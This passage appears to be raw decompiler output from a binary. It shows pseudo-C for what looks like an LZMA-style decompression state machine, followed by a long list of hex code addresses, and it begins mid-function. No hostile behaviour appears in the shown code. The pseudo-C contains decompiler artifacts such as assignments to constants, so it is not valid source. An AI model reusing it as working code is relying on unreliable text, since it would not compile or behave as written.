											 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
											if( *(__ebp - 0x38) >= 4) {
												__eflags =  *(__ebp - 0x38) - 0xa;
												if( *(__ebp - 0x38) >= 0xa) {
													_t98 = __ebp - 0x38;
													 *_t98 =  *(__ebp - 0x38) - 6;
													__eflags =  *_t98;
												} else {
													 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
												}
											} else {
												 *(__ebp - 0x38) = 0;
											}
											__eflags =  *(__ebp - 0x34) - __edx;
											if( *(__ebp - 0x34) == __edx) {
												L35:
												__ebx = 0;
												__ebx = 1;
												goto L61;
											} else {
												L32:
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__ecx =  *(__ebp - 8);
												__ebx = 0;
												__ebx = 1;
												__al =  *((intOrPtr*)(__eax + __ecx));
												 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
												goto L41;
											}
										case 7:
											L66:
											__eflags =  *(__ebp - 0x40) - 1;
											if( *(__ebp - 0x40) != 1) {
												L68:
												__eax =  *(__ebp - 0x24);
												 *(__ebp - 0x80) = 0x16;
												 *(__ebp - 0x20) =  *(__ebp - 0x24);
												__eax =  *(__ebp - 0x28);
												 *(__ebp - 0x24) =  *(__ebp - 0x28);
												__eax =  *(__ebp - 0x2c);
												 *(__ebp - 0x28) =  *(__ebp - 0x2c);
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
												__al = __al & 0x000000fd;
												__eax = (__eflags >= 0) - 1 + 0xa;
												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
												__eax =  *(__ebp - 4);
												__eax =  *(__ebp - 4) + 0x664;
												__eflags = __eax;
												 *(__ebp - 0x58) = __eax;
												goto L69;
											}
											L67:
											__eax =  *(__ebp - 4);
											__ecx =  *(__ebp - 0x38);
											 *(__ebp - 0x84) = 8;
											__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
											goto L132;
										case 8:
											L70:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x84) = 0xa;
												__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
											} else {
												__eax =  *(__ebp - 0x38);
												__ecx =  *(__ebp - 4);
												__eax =  *(__ebp - 0x38) + 0xf;
												 *(__ebp - 0x84) = 9;
												 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
												__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
											}
											goto L132;
										case 9:
											L73:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												goto L90;
											}
											L74:
											__eflags =  *(__ebp - 0x60);
											if( *(__ebp - 0x60) == 0) {
												goto L171;
											}
											L75:
											__eax = 0;
											__eflags =  *(__ebp - 0x38) - 7;
											_t259 =  *(__ebp - 0x38) - 7 >= 0;
											__eflags = _t259;
											0 | _t259 = _t259 + _t259 + 9;
											 *(__ebp - 0x38) = _t259 + _t259 + 9;
											goto L76;
										case 0xa:
											L82:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												L84:
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x84) = 0xb;
												__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
												goto L132;
											}
											L83:
											__eax =  *(__ebp - 0x28);
											goto L89;
										case 0xb:
											L85:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__ecx =  *(__ebp - 0x24);
												__eax =  *(__ebp - 0x20);
												 *(__ebp - 0x20) =  *(__ebp - 0x24);
											} else {
												__eax =  *(__ebp - 0x24);
											}
											__ecx =  *(__ebp - 0x28);
											 *(__ebp - 0x24) =  *(__ebp - 0x28);
											L89:
											__ecx =  *(__ebp - 0x2c);
											 *(__ebp - 0x2c) = __eax;
											 *(__ebp - 0x28) =  *(__ebp - 0x2c);
											L90:
											__eax =  *(__ebp - 4);
											 *(__ebp - 0x80) = 0x15;
											__eax =  *(__ebp - 4) + 0xa68;
											 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
											goto L69;
										case 0xc:
											L99:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												L164:
												 *(__ebp - 0x88) = 0xc;
												goto L170;
											}
											L100:
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t334 = __ebp - 0x70;
											 *_t334 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t334;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											__eax =  *(__ebp - 0x2c);
											goto L101;
										case 0xd:
											L37:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												L159:
												 *(__ebp - 0x88) = 0xd;
												goto L170;
											}
											L38:
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t122 = __ebp - 0x70;
											 *_t122 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t122;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L39:
											__eax =  *(__ebp - 0x40);
											__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
											if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
												goto L48;
											}
											L40:
											__eflags = __ebx - 0x100;
											if(__ebx >= 0x100) {
												goto L54;
											}
											L41:
											__eax =  *(__ebp - 0x5b) & 0x000000ff;
											 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
											__ecx =  *(__ebp - 0x58);
											__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
											 *(__ebp - 0x48) = __eax;
											__eax = __eax + 1;
											__eax = __eax << 8;
											__eax = __eax + __ebx;
											__esi =  *(__ebp - 0x58) + __eax * 2;
											 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
											__ax =  *__esi;
											 *(__ebp - 0x54) = __esi;
											__edx = __ax & 0x0000ffff;
											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
											__eflags =  *(__ebp - 0xc) - __ecx;
											if( *(__ebp - 0xc) >= __ecx) {
												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
												__cx = __ax;
												 *(__ebp - 0x40) = 1;
												__cx = __ax >> 5;
												__eflags = __eax;
												__ebx = __ebx + __ebx + 1;
												 *__esi = __ax;
											} else {
												 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
												 *(__ebp - 0x10) = __ecx;
												0x800 = 0x800 - __edx;
												0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
												__ebx = __ebx + __ebx;
												 *__esi = __cx;
											}
											__eflags =  *(__ebp - 0x10) - 0x1000000;
											 *(__ebp - 0x44) = __ebx;
											if( *(__ebp - 0x10) >= 0x1000000) {
												goto L39;
											} else {
												L45:
												goto L37;
											}
										case 0xe:
											L46:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												L160:
												 *(__ebp - 0x88) = 0xe;
												goto L170;
											}
											L47:
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t156 = __ebp - 0x70;
											 *_t156 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t156;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											while(1) {
												L48:
												__eflags = __ebx - 0x100;
												if(__ebx >= 0x100) {
													break;
												}
												L49:
												__eax =  *(__ebp - 0x58);
												__edx = __ebx + __ebx;
												__ecx =  *(__ebp - 0x10);
												__esi = __edx + __eax;
												__ecx =  *(__ebp - 0x10) >> 0xb;
												__ax =  *__esi;
												 *(__ebp - 0x54) = __esi;
												__edi = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													_t170 = __edx + 1; // 0x1
													__ebx = _t170;
													__cx = __ax >> 5;
													__eflags = __eax;
													 *__esi = __ax;
												} else {
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edi;
													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
													__ebx = __ebx + __ebx;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0x10) >= 0x1000000) {
													continue;
												} else {
													L53:
													goto L46;
												}
											}
											L54:
											_t173 = __ebp - 0x34;
											 *_t173 =  *(__ebp - 0x34) & 0x00000000;
											__eflags =  *_t173;
											goto L55;
										case 0xf:
											L58:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												L161:
												 *(__ebp - 0x88) = 0xf;
												goto L170;
											}
											L59:
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t203 = __ebp - 0x70;
											 *_t203 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t203;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L60:
											__eflags = __ebx - 0x100;
											if(__ebx >= 0x100) {
												L55:
												__al =  *(__ebp - 0x44);
												 *(__ebp - 0x5c) =  *(__ebp - 0x44);
												goto L56;
											}
											L61:
											__eax =  *(__ebp - 0x58);
											__edx = __ebx + __ebx;
											__ecx =  *(__ebp - 0x10);
											__esi = __edx + __eax;
											__ecx =  *(__ebp - 0x10) >> 0xb;
											__ax =  *__esi;
											 *(__ebp - 0x54) = __esi;
											__edi = __ax & 0x0000ffff;
											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
											__eflags =  *(__ebp - 0xc) - __ecx;
											if( *(__ebp - 0xc) >= __ecx) {
												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
												__cx = __ax;
												_t217 = __edx + 1; // 0x1
												__ebx = _t217;
												__cx = __ax >> 5;
												__eflags = __eax;
												 *__esi = __ax;
											} else {
												 *(__ebp - 0x10) = __ecx;
												0x800 = 0x800 - __edi;
												0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
												__ebx = __ebx + __ebx;
												 *__esi = __cx;
											}
											__eflags =  *(__ebp - 0x10) - 0x1000000;
											 *(__ebp - 0x44) = __ebx;
											if( *(__ebp - 0x10) >= 0x1000000) {
												goto L60;
											} else {
												L65:
												goto L58;
											}
										case 0x10:
											L109:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												L165:
												 *(__ebp - 0x88) = 0x10;
												goto L170;
											}
											L110:
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t365 = __ebp - 0x70;
											 *_t365 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t365;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											goto L111;
										case 0x11:
											L69:
											__esi =  *(__ebp - 0x58);
											 *(__ebp - 0x84) = 0x12;
											goto L132;
										case 0x12:
											L128:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												L131:
												__eax =  *(__ebp - 0x58);
												 *(__ebp - 0x84) = 0x13;
												__esi =  *(__ebp - 0x58) + 2;
												L132:
												 *(_t644 - 0x54) = _t642;
												goto L133;
											}
											L129:
											__eax =  *(__ebp - 0x4c);
											 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
											__ecx =  *(__ebp - 0x58);
											__eax =  *(__ebp - 0x4c) << 4;
											__eflags = __eax;
											__eax =  *(__ebp - 0x58) + __eax + 4;
											goto L130;
										case 0x13:
											L141:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												L143:
												_t469 = __ebp - 0x58;
												 *_t469 =  *(__ebp - 0x58) + 0x204;
												__eflags =  *_t469;
												 *(__ebp - 0x30) = 0x10;
												 *(__ebp - 0x40) = 8;
												L144:
												 *((intOrPtr*)(__ebp - 0x7c)) = 0x14;
												L145:
												 *(_t644 - 0x50) = 1;
												 *(_t644 - 0x48) =  *(_t644 - 0x40);
												goto L149;
											}
											L142:
											__eax =  *(__ebp - 0x4c);
											__ecx =  *(__ebp - 0x58);
											__eax =  *(__ebp - 0x4c) << 4;
											 *(__ebp - 0x30) = 8;
											__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
											L130:
											 *(__ebp - 0x58) = __eax;
											 *(__ebp - 0x40) = 3;
											goto L144;
										case 0x14:
											L156:
											 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
											__eax =  *(__ebp - 0x80);
											while(1) {
												L140:
												 *(_t644 - 0x88) = _t537;
												goto L1;
											}
										case 0x15:
											L91:
											__eax = 0;
											__eflags =  *(__ebp - 0x38) - 7;
											0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
											__al = __al & 0x000000fd;
											__eax = (__eflags >= 0) - 1 + 0xb;
											 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
											goto L120;
										case 0x16:
											goto L0;
										case 0x17:
											while(1) {
												L145:
												 *(_t644 - 0x50) = 1;
												 *(_t644 - 0x48) =  *(_t644 - 0x40);
												goto L149;
											}
										case 0x18:
											goto L146;
										case 0x19:
											L94:
											__eflags = __ebx - 4;
											if(__ebx < 4) {
												L98:
												 *(__ebp - 0x2c) = __ebx;
												L119:
												_t393 = __ebp - 0x2c;
												 *_t393 =  *(__ebp - 0x2c) + 1;
												__eflags =  *_t393;
												L120:
												__eax =  *(__ebp - 0x2c);
												__eflags = __eax;
												if(__eax == 0) {
													L166:
													 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
													goto L170;
												}
												L121:
												__eflags = __eax -  *(__ebp - 0x60);
												if(__eax >  *(__ebp - 0x60)) {
													goto L171;
												}
												L122:
												 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
												__eax =  *(__ebp - 0x30);
												_t400 = __ebp - 0x60;
												 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
												__eflags =  *_t400;
												goto L123;
											}
											L95:
											__ecx = __ebx;
											__eax = __ebx;
											__ecx = __ebx >> 1;
											__eax = __ebx & 0x00000001;
											__ecx = (__ebx >> 1) - 1;
											__al = __al | 0x00000002;
											__eax = (__ebx & 0x00000001) << __cl;
											__eflags = __ebx - 0xe;
											 *(__ebp - 0x2c) = __eax;
											if(__ebx >= 0xe) {
												L97:
												__ebx = 0;
												 *(__ebp - 0x48) = __ecx;
												L102:
												__eflags =  *(__ebp - 0x48);
												if( *(__ebp - 0x48) <= 0) {
													L107:
													__eax = __eax + __ebx;
													 *(__ebp - 0x40) = 4;
													 *(__ebp - 0x2c) = __eax;
													__eax =  *(__ebp - 4);
													__eax =  *(__ebp - 4) + 0x644;
													__eflags = __eax;
													L108:
													__ebx = 0;
													 *(__ebp - 0x58) = __eax;
													 *(__ebp - 0x50) = 1;
													 *(__ebp - 0x44) = 0;
													 *(__ebp - 0x48) = 0;
													L112:
													__eax =  *(__ebp - 0x40);
													__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
													if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
														L118:
														_t391 = __ebp - 0x2c;
														 *_t391 =  *(__ebp - 0x2c) + __ebx;
														__eflags =  *_t391;
														goto L119;
													}
													L113:
													__eax =  *(__ebp - 0x50);
													 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
													__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
													__eax =  *(__ebp - 0x58);
													__esi = __edi + __eax;
													 *(__ebp - 0x54) = __esi;
													__ax =  *__esi;
													__ecx = __ax & 0x0000ffff;
													__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
													__eflags =  *(__ebp - 0xc) - __edx;
													if( *(__ebp - 0xc) >= __edx) {
														__ecx = 0;
														 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
														__ecx = 1;
														 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
														__ebx = 1;
														__ecx =  *(__ebp - 0x48);
														__ebx = 1 << __cl;
														__ecx = 1 << __cl;
														__ebx =  *(__ebp - 0x44);
														__ebx =  *(__ebp - 0x44) | __ecx;
														__cx = __ax;
														__cx = __ax >> 5;
														__eax = __eax - __ecx;
														__edi = __edi + 1;
														__eflags = __edi;
														 *(__ebp - 0x44) = __ebx;
														 *__esi = __ax;
														 *(__ebp - 0x50) = __edi;
													} else {
														 *(__ebp - 0x10) = __edx;
														0x800 = 0x800 - __ecx;
														0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
														 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
														 *__esi = __dx;
													}
													__eflags =  *(__ebp - 0x10) - 0x1000000;
													if( *(__ebp - 0x10) >= 0x1000000) {
														L111:
														_t368 = __ebp - 0x48;
														 *_t368 =  *(__ebp - 0x48) + 1;
														__eflags =  *_t368;
														goto L112;
													} else {
														L117:
														goto L109;
													}
												}
												L103:
												__ecx =  *(__ebp - 0xc);
												__ebx = __ebx + __ebx;
												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
												__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
													__ecx =  *(__ebp - 0x10);
													 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
													__ebx = __ebx | 0x00000001;
													__eflags = __ebx;
													 *(__ebp - 0x44) = __ebx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												if( *(__ebp - 0x10) >= 0x1000000) {
													L101:
													_t338 = __ebp - 0x48;
													 *_t338 =  *(__ebp - 0x48) - 1;
													__eflags =  *_t338;
													goto L102;
												} else {
													L106:
													goto L99;
												}
											}
											L96:
											__edx =  *(__ebp - 4);
											__eax = __eax - __ebx;
											 *(__ebp - 0x40) = __ecx;
											__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
											goto L108;
										case 0x1a:
											L56:
											__eflags =  *(__ebp - 0x64);
											if( *(__ebp - 0x64) == 0) {
												L162:
												 *(__ebp - 0x88) = 0x1a;
												goto L170;
											}
											L57:
											__ecx =  *(__ebp - 0x68);
											__al =  *(__ebp - 0x5c);
											__edx =  *(__ebp - 8);
											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
											 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
											 *( *(__ebp - 0x68)) = __al;
											__ecx =  *(__ebp - 0x14);
											 *(__ecx +  *(__ebp - 8)) = __al;
											__eax = __ecx + 1;
											__edx = 0;
											_t192 = __eax %  *(__ebp - 0x74);
											__eax = __eax /  *(__ebp - 0x74);
											__edx = _t192;
											goto L80;
										case 0x1b:
											L76:
											__eflags =  *(__ebp - 0x64);
											if( *(__ebp - 0x64) == 0) {
												L163:
												 *(__ebp - 0x88) = 0x1b;
												goto L170;
											}
											L77:
											__eax =  *(__ebp - 0x14);
											__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
											__eflags = __eax -  *(__ebp - 0x74);
											if(__eax >=  *(__ebp - 0x74)) {
												__eax = __eax +  *(__ebp - 0x74);
												__eflags = __eax;
											}
											__edx =  *(__ebp - 8);
											__cl =  *(__eax + __edx);
											__eax =  *(__ebp - 0x14);
											 *(__ebp - 0x5c) = __cl;
											 *(__eax + __edx) = __cl;
											__eax = __eax + 1;
											__edx = 0;
											_t275 = __eax %  *(__ebp - 0x74);
											__eax = __eax /  *(__ebp - 0x74);
											__edx = _t275;
											__eax =  *(__ebp - 0x68);
											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
											_t284 = __ebp - 0x64;
											 *_t284 =  *(__ebp - 0x64) - 1;
											__eflags =  *_t284;
											 *( *(__ebp - 0x68)) = __cl;
											L80:
											 *(__ebp - 0x14) = __edx;
											goto L81;
										case 0x1c:
											while(1) {
												L123:
												__eflags =  *(__ebp - 0x64);
												if( *(__ebp - 0x64) == 0) {
													break;
												}
												L124:
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__edx =  *(__ebp - 8);
												__cl =  *(__eax + __edx);
												__eax =  *(__ebp - 0x14);
												 *(__ebp - 0x5c) = __cl;
												 *(__eax + __edx) = __cl;
												__eax = __eax + 1;
												__edx = 0;
												_t414 = __eax %  *(__ebp - 0x74);
												__eax = __eax /  *(__ebp - 0x74);
												__edx = _t414;
												__eax =  *(__ebp - 0x68);
												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
												 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
												 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
												__eflags =  *(__ebp - 0x30);
												 *( *(__ebp - 0x68)) = __cl;
												 *(__ebp - 0x14) = _t414;
												if( *(__ebp - 0x30) > 0) {
													continue;
												} else {
													L127:
													L81:
													 *(__ebp - 0x88) = 2;
													goto L1;
												}
											}
											L167:
											 *(__ebp - 0x88) = 0x1c;
											goto L170;
									}
								}
								L171:
								_t539 = _t538 | 0xffffffff;
								goto L172;
							}
						}
					}
				}
			}















                                              0x00406768
                                              0x00406768
                                              0x00406768
                                              0x00406768
                                              0x0040676e
                                              0x00406772
                                              0x00406776
                                              0x00406780
                                              0x0040678e
                                              0x00406a64
                                              0x00406a64
                                              0x00406a67
                                              0x00406a6e
                                              0x00406a9b
                                              0x00406a9b
                                              0x00406a9f
                                              0x00000000
                                              0x00000000
                                              0x00406aa1
                                              0x00406aaa
                                              0x00406ab0
                                              0x00406ab3
                                              0x00406ab6
                                              0x00406ab9
                                              0x00406abc
                                              0x00406ac2
                                              0x00406adb
                                              0x00406ade
                                              0x00406aea
                                              0x00406aeb
                                              0x00406aee
                                              0x00406ac4
                                              0x00406ac4
                                              0x00406ad3
                                              0x00406ad6
                                              0x00406ad6
                                              0x00406af8
                                              0x00406a98
                                              0x00406a98
                                              0x00406a98
                                              0x00406a9b
                                              0x00406a9f
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x00406afa
                                              0x00406afa
                                              0x00406a73
                                              0x00406a77
                                              0x00406baf
                                              0x00406baf
                                              0x00406bb9
                                              0x00406bc1
                                              0x00406bc8
                                              0x00406bca
                                              0x00406bd1
                                              0x00406bd5
                                              0x00406bd5
                                              0x00406a7d
                                              0x00406a83
                                              0x00406a8a
                                              0x00406a92
                                              0x00406a92
                                              0x00406a95
                                              0x00000000
                                              0x00406a95
                                              0x00406aff
                                              0x00406b0c
                                              0x00406b0f
                                              0x00406a1b
                                              0x00406a1b
                                              0x00406a1b
                                              0x004061b7
                                              0x004061b7
                                              0x004061b7
                                              0x004061c0
                                              0x00000000
                                              0x00000000
                                              0x004061c6
                                              0x004061c6
                                              0x00000000
                                              0x004061cd
                                              0x004061d1
                                              0x00000000
                                              0x00000000
                                              0x004061d7
                                              0x004061da
                                              0x004061dd
                                              0x004061e0
                                              0x004061e4
                                              0x00000000
                                              0x00000000
                                              0x004061ea
                                              0x004061ea
                                              0x004061ed
                                              0x004061ef
                                              0x004061f0
                                              0x004061f3
                                              0x004061f5
                                              0x004061f6
                                              0x004061f8
                                              0x004061fb
                                              0x00406200
                                              0x00406205
                                              0x0040620e
                                              0x00406221
                                              0x00406224
                                              0x00406230
                                              0x00406258
                                              0x0040625a
                                              0x00406268
                                              0x00406268
                                              0x0040626c
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x0040625c
                                              0x0040625c
                                              0x0040625f
                                              0x00406260
                                              0x00406260
                                              0x00000000
                                              0x0040625c
                                              0x00406232
                                              0x00406236
                                              0x0040623b
                                              0x0040623b
                                              0x00406244
                                              0x0040624c
                                              0x0040624f
                                              0x00000000
                                              0x00406255
                                              0x00406255
                                              0x00000000
                                              0x00406255
                                              0x00000000
                                              0x00406272
                                              0x00406272
                                              0x00406276
                                              0x00406b22
                                              0x00406b22
                                              0x00000000
                                              0x00406b22
                                              0x0040627c
                                              0x0040627f
                                              0x0040628f
                                              0x00406292
                                              0x00406295
                                              0x00406295
                                              0x00406295
                                              0x00406298
                                              0x0040629c
                                              0x00000000
                                              0x00000000
                                              0x0040629e
                                              0x0040629e
                                              0x004062a4
                                              0x004062ce
                                              0x004062d4
                                              0x004062db
                                              0x00000000
                                              0x004062db
                                              0x004062a6
                                              0x004062aa
                                              0x004062ad
                                              0x004062b2
                                              0x004062b2
                                              0x004062bd
                                              0x004062c5
                                              0x004062c8
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x0040630d
                                              0x00406313
                                              0x00406316
                                              0x00406323
                                              0x0040632b
                                              0x00000000
                                              0x00000000
                                              0x004062e2
                                              0x004062e2
                                              0x004062e6
                                              0x00406b31
                                              0x00406b31
                                              0x00000000
                                              0x00406b31
                                              0x004062ec
                                              0x004062f2
                                              0x004062fd
                                              0x004062fd
                                              0x004062fd
                                              0x00406300
                                              0x00406303
                                              0x00406306
                                              0x0040630b
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x004069a2
                                              0x004069a2
                                              0x004069a8
                                              0x004069ae
                                              0x004069b4
                                              0x004069ce
                                              0x004069d1
                                              0x004069d7
                                              0x004069e2
                                              0x004069e2
                                              0x004069e4
                                              0x004069b6
                                              0x004069b6
                                              0x004069c5
                                              0x004069c9
                                              0x004069c9
                                              0x004069ee
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x004069f0
                                              0x004069f4
                                              0x00406ba3
                                              0x00406ba3
                                              0x00000000
                                              0x00406ba3
                                              0x004069fa
                                              0x00406a00
                                              0x00406a07
                                              0x00406a0f
                                              0x00406a12
                                              0x00406a15
                                              0x00406a15
                                              0x00406a1b
                                              0x00406a1b
                                              0x00000000
                                              0x00000000
                                              0x00406333
                                              0x00406333
                                              0x00406335
                                              0x00406338
                                              0x004063a9
                                              0x004063a9
                                              0x004063ac
                                              0x004063af
                                              0x004063b6
                                              0x004063c0
                                              0x00000000
                                              0x004063c0
                                              0x0040633a
                                              0x0040633a
                                              0x0040633e
                                              0x00406341
                                              0x00406343
                                              0x00406346
                                              0x00406349
                                              0x0040634b
                                              0x0040634e
                                              0x00406350
                                              0x00406355
                                              0x00406358
                                              0x0040635b
                                              0x0040635f
                                              0x00406366
                                              0x00406369
                                              0x00406370
                                              0x00406374
                                              0x0040637c
                                              0x0040637c
